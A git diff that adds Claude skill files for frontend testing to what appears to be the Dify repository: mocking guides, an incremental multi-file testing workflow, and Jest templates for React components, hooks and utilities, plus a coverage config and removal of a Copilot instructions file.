+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. 
**Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Uses shared mock (auto-loaded). Override only for custom translations +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/guides/workflow.md b/.claude/skills/frontend-testing/guides/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/guides/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? 
+ +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. **Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. 
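As a concrete illustration, here is a minimal shell sketch of the incremental loop described above. The file and directory names are hypothetical; the commands themselves (`pnpm analyze-component`, `pnpm test`) are the same invocations used throughout this guide:

```bash
# Assess complexity first (pass the component path as the argument)
pnpm analyze-component app/components/item-card/index.tsx

# Incremental loop: one spec at a time, verify before moving on
pnpm test -- app/components/item-card/utils/helper.spec.ts   # utility first
pnpm test -- app/components/item-card/use-item-card.spec.ts  # then the hook
pnpm test -- app/components/item-card/index.spec.tsx         # component last

# Only after every file passes individually, run the directory together
pnpm test -- app/components/item-card/
pnpm test -- --coverage app/components/item-card/
```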
+ +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. 
+Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. +``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.claude/skills/frontend-testing/templates/component-test.template.tsx b/.claude/skills/frontend-testing/templates/component-test.template.tsx new file mode 100644 index 0000000000..f1ea71a3fd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/component-test.template.tsx @@ -0,0 +1,296 @@ +/** + * Test Template for React Components + * + * WHY THIS STRUCTURE? + * - Organized sections make tests easy to navigate and maintain + * - Mocks at top ensure consistent test isolation + * - Factory functions reduce duplication and improve readability + * - describe blocks group related scenarios for better debugging + * + * INSTRUCTIONS: + * 1. Replace `ComponentName` with your component name + * 2. Update import path + * 3. Add/remove test sections based on component features (use analyze-component) + * 4. Follow AAA pattern: Arrange → Act → Assert + * + * RUN FIRST: pnpm analyze-component to identify required test scenarios + */ + +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +// import ComponentName from './index' + +// ============================================================================ +// Mocks +// ============================================================================ +// WHY: Mocks must be hoisted to top of file (Jest requirement). +// They run BEFORE imports, so keep them before component imports. 
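// Illustration of the hoisting behavior (mirrors the API-service mock example
// further below): Jest moves jest.mock calls above imports when the test file
// is compiled, so the import already receives the mocked module:
//
//   jest.mock('@/service/api')             // hoisted above the import below
//   import * as api from '@/service/api'   // already the auto-mocked version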
+ +// i18n (automatically mocked) +// WHY: Shared mock at web/__mocks__/react-i18next.ts is auto-loaded by Jest +// No explicit mock needed - it returns translation keys as-is +// Override only if custom translations are required: +// jest.mock('react-i18next', () => ({ +// useTranslation: () => ({ +// t: (key: string) => { +// const customTranslations: Record = { +// 'my.custom.key': 'Custom Translation', +// } +// return customTranslations[key] || key +// }, +// }), +// })) + +// Router (if component uses useRouter, usePathname, useSearchParams) +// WHY: Isolates tests from Next.js routing, enables testing navigation behavior +// const mockPush = jest.fn() +// jest.mock('next/navigation', () => ({ +// useRouter: () => ({ push: mockPush }), +// usePathname: () => '/test-path', +// })) + +// API services (if component fetches data) +// WHY: Prevents real network calls, enables testing all states (loading/success/error) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// Shared mock state (for portal/dropdown components) +// WHY: Portal components like PortalToFollowElem need shared state between +// parent and child mocks to correctly simulate open/close behavior +// let mockOpenState = false + +// ============================================================================ +// Test Data Factories +// ============================================================================ +// WHY FACTORIES? +// - Avoid hard-coded test data scattered across tests +// - Easy to create variations with overrides +// - Type-safe when using actual types from source +// - Single source of truth for default test values + +// const createMockProps = (overrides = {}) => ({ +// // Default props that make component render successfully +// ...overrides, +// }) + +// const createMockItem = (overrides = {}) => ({ +// id: 'item-1', +// name: 'Test Item', +// ...overrides, +// }) + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// const renderComponent = (props = {}) => { +// return render() +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('ComponentName', () => { + // WHY beforeEach with clearAllMocks? 
+ // - Ensures each test starts with clean slate + // - Prevents mock call history from leaking between tests + // - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes + beforeEach(() => { + jest.clearAllMocks() + // Reset shared mock state if used (CRITICAL for portal/dropdown tests) + // mockOpenState = false + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED - Every component MUST have these) + // -------------------------------------------------------------------------- + // WHY: Catches import errors, missing providers, and basic render issues + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange - Setup data and mocks + // const props = createMockProps() + + // Act - Render the component + // render() + + // Assert - Verify expected output + // Prefer getByRole for accessibility; it's what users "see" + // expect(screen.getByRole('...')).toBeInTheDocument() + }) + + it('should render with default props', () => { + // WHY: Verifies component works without optional props + // render() + // expect(screen.getByText('...')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED - Every component MUST test prop behavior) + // -------------------------------------------------------------------------- + // WHY: Props are the component's API contract. Test them thoroughly. + describe('Props', () => { + it('should apply custom className', () => { + // WHY: Common pattern in Dify - components should merge custom classes + // render() + // expect(screen.getByTestId('component')).toHaveClass('custom-class') + }) + + it('should use default values for optional props', () => { + // WHY: Verifies TypeScript defaults work at runtime + // render() + // expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions (if component has event handlers - on*, handle*) + // -------------------------------------------------------------------------- + // WHY: Event handlers are core functionality. Test from user's perspective. + describe('User Interactions', () => { + it('should call onClick when clicked', async () => { + // WHY userEvent over fireEvent? + // - userEvent simulates real user behavior (focus, hover, then click) + // - fireEvent is lower-level, doesn't trigger all browser events + // const user = userEvent.setup() + // const handleClick = jest.fn() + // render() + // + // await user.click(screen.getByRole('button')) + // + // expect(handleClick).toHaveBeenCalledTimes(1) + }) + + it('should call onChange when value changes', async () => { + // const user = userEvent.setup() + // const handleChange = jest.fn() + // render() + // + // await user.type(screen.getByRole('textbox'), 'new value') + // + // expect(handleChange).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // State Management (if component uses useState/useReducer) + // -------------------------------------------------------------------------- + // WHY: Test state through observable UI changes, not internal state values + describe('State Management', () => { + it('should update state on interaction', async () => { + // WHY test via UI, not state? 
+ // - State is implementation detail; UI is what users see + // - If UI works correctly, state must be correct + // const user = userEvent.setup() + // render() + // + // // Initial state - verify what user sees + // expect(screen.getByText('Initial')).toBeInTheDocument() + // + // // Trigger state change via user action + // await user.click(screen.getByRole('button')) + // + // // New state - verify UI updated + // expect(screen.getByText('Updated')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations (if component fetches data - useSWR, useQuery, fetch) + // -------------------------------------------------------------------------- + // WHY: Async operations have 3 states users experience: loading, success, error + describe('Async Operations', () => { + it('should show loading state', () => { + // WHY never-resolving promise? + // - Keeps component in loading state for assertion + // - Alternative: use fake timers + // mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) + // render() + // + // expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) + + it('should show data on success', async () => { + // WHY waitFor? + // - Component updates asynchronously after fetch resolves + // - waitFor retries assertion until it passes or times out + // mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] }) + // render() + // + // await waitFor(() => { + // expect(screen.getByText('Item 1')).toBeInTheDocument() + // }) + }) + + it('should show error on failure', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // render() + // + // await waitFor(() => { + // expect(screen.getByText(/error/i)).toBeInTheDocument() + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED - Every component MUST handle edge cases) + // -------------------------------------------------------------------------- + // WHY: Real-world data is messy. Components must handle: + // - Null/undefined from API failures or optional fields + // - Empty arrays/strings from user clearing data + // - Boundary values (0, MAX_INT, special characters) + describe('Edge Cases', () => { + it('should handle null value', () => { + // WHY test null specifically? + // - API might return null for missing data + // - Prevents "Cannot read property of null" in production + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle undefined value', () => { + // WHY test undefined separately from null? 
+ // - TypeScript treats them differently + // - Optional props are undefined, not null + // render(<ComponentName value={undefined} />) + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + // WHY: Empty state often needs special UI (e.g., "No items yet") + // render(<ComponentName items={[]} />) + // expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + + it('should handle empty string', () => { + // WHY: Empty strings are falsy in JS and render as visually empty + // render(<ComponentName value="" />) + // expect(screen.getByText(/placeholder/i)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Accessibility (optional but recommended for Dify's enterprise users) + // -------------------------------------------------------------------------- + // WHY: Dify has enterprise customers who may require accessibility compliance + describe('Accessibility', () => { + it('should have accessible name', () => { + // WHY getByRole with name? + // - Tests that screen readers can identify the element + // - Enforces proper labeling practices + // render(<ComponentName aria-label="Test label" />) + // expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument() + }) + + it('should support keyboard navigation', async () => { + // WHY: Some users can't use a mouse + // const user = userEvent.setup() + // render(<ComponentName />) + // + // await user.tab() + // expect(screen.getByRole('button')).toHaveFocus() + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/hook-test.template.ts b/.claude/skills/frontend-testing/templates/hook-test.template.ts new file mode 100644 index 0000000000..4fb7fd21ec --- /dev/null +++ b/.claude/skills/frontend-testing/templates/hook-test.template.ts @@ -0,0 +1,207 @@ +/** + * Test Template for Custom Hooks + * + * Instructions: + * 1. Replace `useHookName` with your hook name + * 2. Update import path + * 3.
Add/remove test sections based on hook features + */ + +import { renderHook, act, waitFor } from '@testing-library/react' +// import { useHookName } from './use-hook-name' + +// ============================================================================ +// Mocks +// ============================================================================ + +// API services (if hook fetches data) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked<typeof api> + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// Wrapper for hooks that need context +// const createWrapper = (contextValue = {}) => { +// return ({ children }: { children: React.ReactNode }) => ( +// <SomeContext.Provider value={contextValue}> +// {children} +// </SomeContext.Provider> +// ) +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('useHookName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Initial State + // -------------------------------------------------------------------------- + describe('Initial State', () => { + it('should return initial state', () => { + // const { result } = renderHook(() => useHookName()) + // + // expect(result.current.value).toBe(initialValue) + // expect(result.current.isLoading).toBe(false) + }) + + it('should accept initial value from props', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'custom' })) + // + // expect(result.current.value).toBe('custom') + }) + }) + + // -------------------------------------------------------------------------- + // State Updates + // -------------------------------------------------------------------------- + describe('State Updates', () => { + it('should update value when setValue is called', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(result.current.value).toBe('new value') + }) + + it('should reset to initial value', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'initial' })) + // + // act(() => { + // result.current.setValue('changed') + // }) + // expect(result.current.value).toBe('changed') + // + // act(() => { + // result.current.reset() + // }) + // expect(result.current.value).toBe('initial') + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations + // -------------------------------------------------------------------------- + describe('Async Operations', () => { + it('should fetch data on mount', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result } = renderHook(() => useHookName()) + // + // // Initially loading + // expect(result.current.isLoading).toBe(true) + // + // // Wait for data + // await waitFor(() => { + // expect(result.current.isLoading).toBe(false) + // }) + // + // expect(result.current.data).toEqual({ data: 'test' }) + }) + + it('should handle fetch error', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // + // const { result } = renderHook(() => useHookName()) + // + // await waitFor(() => { + // expect(result.current.error).toBeTruthy() + // }) + // + //
expect(result.current.error?.message).toBe('Network error') + }) + + it('should refetch when dependency changes', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result, rerender } = renderHook( + // ({ id }) => useHookName(id), + // { initialProps: { id: '1' } } + // ) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('1') + // }) + // + // rerender({ id: '2' }) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('2') + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Side Effects + // -------------------------------------------------------------------------- + describe('Side Effects', () => { + it('should call callback when value changes', () => { + // const callback = jest.fn() + // const { result } = renderHook(() => useHookName({ onChange: callback })) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(callback).toHaveBeenCalledWith('new value') + }) + + it('should cleanup on unmount', () => { + // const cleanup = jest.fn() + // jest.spyOn(window, 'addEventListener') + // jest.spyOn(window, 'removeEventListener') + // + // const { unmount } = renderHook(() => useHookName()) + // + // expect(window.addEventListener).toHaveBeenCalled() + // + // unmount() + // + // expect(window.removeEventListener).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle null input', () => { + // const { result } = renderHook(() => useHookName(null)) + // + // expect(result.current.value).toBeNull() + }) + + it('should handle rapid updates', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('1') + // result.current.setValue('2') + // result.current.setValue('3') + // }) + // + // expect(result.current.value).toBe('3') + }) + }) + + // -------------------------------------------------------------------------- + // With Context (if hook uses context) + // -------------------------------------------------------------------------- + describe('With Context', () => { + it('should use context value', () => { + // const wrapper = createWrapper({ someValue: 'context-value' }) + // const { result } = renderHook(() => useHookName(), { wrapper }) + // + // expect(result.current.contextValue).toBe('context-value') + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/utility-test.template.ts b/.claude/skills/frontend-testing/templates/utility-test.template.ts new file mode 100644 index 0000000000..ec13b5f5bd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/utility-test.template.ts @@ -0,0 +1,154 @@ +/** + * Test Template for Utility Functions + * + * Instructions: + * 1. Replace `utilityFunction` with your function name + * 2. Update import path + * 3. 
Use test.each for data-driven tests + */ + +// import { utilityFunction } from './utility' + +// ============================================================================ +// Tests +// ============================================================================ + +describe('utilityFunction', () => { + // -------------------------------------------------------------------------- + // Basic Functionality + // -------------------------------------------------------------------------- + describe('Basic Functionality', () => { + it('should return expected result for valid input', () => { + // expect(utilityFunction('input')).toBe('expected-output') + }) + + it('should handle multiple arguments', () => { + // expect(utilityFunction('a', 'b', 'c')).toBe('abc') + }) + }) + + // -------------------------------------------------------------------------- + // Data-Driven Tests + // -------------------------------------------------------------------------- + describe('Input/Output Mapping', () => { + test.each([ + // [input, expected] + ['input1', 'output1'], + ['input2', 'output2'], + ['input3', 'output3'], + ])('should map input %s to %s', (input, expected) => { + // expect(utilityFunction(input)).toBe(expected) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty string', () => { + // expect(utilityFunction('')).toBe('') + }) + + it('should handle null', () => { + // expect(utilityFunction(null)).toBe(null) + // or + // expect(() => utilityFunction(null)).toThrow() + }) + + it('should handle undefined', () => { + // expect(utilityFunction(undefined)).toBe(undefined) + // or + // expect(() => utilityFunction(undefined)).toThrow() + }) + + it('should handle empty array', () => { + // expect(utilityFunction([])).toEqual([]) + }) + + it('should handle empty object', () => { + // expect(utilityFunction({})).toEqual({}) + }) + }) + + // -------------------------------------------------------------------------- + // Boundary Conditions + // -------------------------------------------------------------------------- + describe('Boundary Conditions', () => { + it('should handle minimum value', () => { + // expect(utilityFunction(0)).toBe(0) + }) + + it('should handle maximum value', () => { + // expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...) + }) + + it('should handle negative numbers', () => { + // expect(utilityFunction(-1)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Type Coercion (if applicable) + // -------------------------------------------------------------------------- + describe('Type Handling', () => { + it('should handle numeric string', () => { + // expect(utilityFunction('123')).toBe(123) + }) + + it('should handle boolean', () => { + // expect(utilityFunction(true)).toBe(...)
+ }) + }) + + // -------------------------------------------------------------------------- + // Error Cases + // -------------------------------------------------------------------------- + describe('Error Handling', () => { + it('should throw for invalid input', () => { + // expect(() => utilityFunction('invalid')).toThrow('Error message') + }) + + it('should throw with specific error type', () => { + // expect(() => utilityFunction('invalid')).toThrow(ValidationError) + }) + }) + + // -------------------------------------------------------------------------- + // Complex Objects (if applicable) + // -------------------------------------------------------------------------- + describe('Object Handling', () => { + it('should preserve object structure', () => { + // const input = { a: 1, b: 2 } + // expect(utilityFunction(input)).toEqual({ a: 1, b: 2 }) + }) + + it('should handle nested objects', () => { + // const input = { nested: { deep: 'value' } } + // expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } }) + }) + + it('should not mutate input', () => { + // const input = { a: 1 } + // const inputCopy = { ...input } + // utilityFunction(input) + // expect(input).toEqual(inputCopy) + }) + }) + + // -------------------------------------------------------------------------- + // Array Handling (if applicable) + // -------------------------------------------------------------------------- + describe('Array Handling', () => { + it('should process all elements', () => { + // expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6]) + }) + + it('should handle single element array', () => { + // expect(utilityFunction([1])).toEqual([2]) + }) + + it('should preserve order', () => { + // expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b']) + }) + }) +}) diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + api/core/rag/datasource/vdb/* diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. - -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. 
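To make the utility template concrete, here is a hypothetical filled-in version of its data-driven and edge-case sections; `formatBytes`, its import path, and the expected outputs are illustrative stand-ins rather than part of the diff:

```typescript
import { formatBytes } from './format-bytes' // hypothetical utility under test

describe('formatBytes', () => {
  // Data-driven mapping, as in the template's Input/Output Mapping section
  test.each([
    // [input, expected]
    [0, '0 B'],
    [1024, '1 KB'],
    [1048576, '1 MB'],
  ])('should map input %s to %s', (input, expected) => {
    expect(formatBytes(input)).toBe(expected)
  })

  // Edge case, as in the template's Edge Cases / Boundary Conditions sections
  it('should throw for negative input', () => {
    expect(() => formatBytes(-1)).toThrow()
  })
})
```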
